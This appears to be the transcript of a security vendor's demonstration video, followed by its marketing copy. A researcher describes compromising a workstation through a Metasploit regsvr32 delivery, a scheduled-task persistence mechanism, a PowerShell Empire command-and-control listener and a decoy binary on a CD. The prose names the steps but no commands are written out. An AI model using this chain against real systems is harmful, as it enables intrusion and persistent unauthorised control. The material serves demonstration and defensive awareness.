In this video, Trenton Ivey, Secureworks Offensive Researcher, Counter Threat Unit and Adversarial Security Testing, gives a demonstration of how an attacker would initially compromise a system by creating a command and control server using Metasploit framework and Powershell Empire.
We will begin by creating a command and control server using METASPLOIT framework and PowerShell Empire. First we'll use METASPLOIT to serve a file that when used with regsvr32 will execute a command of our choice on the target system. For now, we'll leave the command option as blank and run the module as a background job.
METASPLOIT provides us with a command that when run will cause a target system to connect to our server and execute the command that we specified. We'll copy this command and use it to make a new command. This new command will create a scheduled task that regularly runs regsvr32 command provided by METASPLOIT.
This acts as a simple form of persistence. We will create a malicious binary that will run this command in the background as soon as it is executed. This gives the ability to regularly send commands to our target system but it isn't very interactive so we'll use PowerShell Empire to get a more advanced shell.
In PowerShell Empire, we'll create a new listener that will wait for agents to connect to c2.example.com:8080. Next we'll create a launcher. Running this launcher, which is just a PowerShell script, will cause a target system to connect to our c2 and wait for further commands.
Finally, we'll set the PowerShell Empire launcher as our METASPLOIT command and then restart our server. In this scenario, we've sent our users a CD containing the malicious file. When they run the binary, it will prompt them and confirm that they are in fact an employee of ACME and that they have the appropriate authority to view the documents that the binary contains.
If they continue it will provide them with a prompt that asks where they want to save the documents. Even further, if they run the extractor, it will extract a document that appears to be legitimate and is benign. However as soon as the binary was run, our scheduled task command was executed as evidence.
If we look at the task name we can see that the task to run is our regsvr command and it's set to run every five minutes. When the scheduled task runs our command, we can see METASPLOIT handling the request from the regsvr32 command. This will load our PowerShell command which then should connect to PowerShell Empire and we can see an agent coming back in.
We can now interact with the agent and run things like sysinfo. This will send a command to the target system to pull back additional information about the system. I can see here we're logged in on the CORP domain as the username of mbishop. We can see that it's a laptop with the username of mbishop. This is a good start.
The old approaches to cybersecurity are no longer adequate. It’s time for something new. Layered defenses can create almost as many problems as they solve, and security teams struggle to keep up with the threat. What you need is context across all your layers of defense with the right people, processes, and technology working together in concert. That’s how Secureworks can help. Using 20+ years of industry knowledge, advanced analytics, industry-leading threat intelligence, and the network effect of more than 4,000 customer environments, we provide world-class cybersecurity solutions to customers around the globe. This unmatched experience empowers our customers to be Collectively Smarter. Exponentially Safer.™
Our Managed Detection and Response (MDR) solution is comprehensive, powered by our cloud-native software Red Cloak™ Threat Detection and Response that uses AI and machine learning to deliver better outcomes for your security operations. MDR unifies telemetry from your existing security technology to maximize visibility, reduce complexity, and enable you to move at the speed of the threat. Learn more about how Managed Detection and Response uses contextualized visibility to improve your organization’s security posture.